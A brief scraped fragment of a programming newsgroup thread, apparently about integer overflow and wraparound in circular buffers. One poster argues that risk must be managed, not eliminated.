opt-ipc-uarch.eps 100%[===================>] 2.15M 8.38MB/s in 0.3s

- anton

dxf

2024-03-11 01:00:12 UTC

Post by Paul Rubin
...
Yes there are situations like circular buffers where you might want that
wraparound,

Want? It won't result in data being overwritten? Risk cannot be eliminated
- only managed. To manage risk one must be familiar with it - not handing
it over to a higher power.

Paul Rubin

2024-03-04 20:23:04 UTC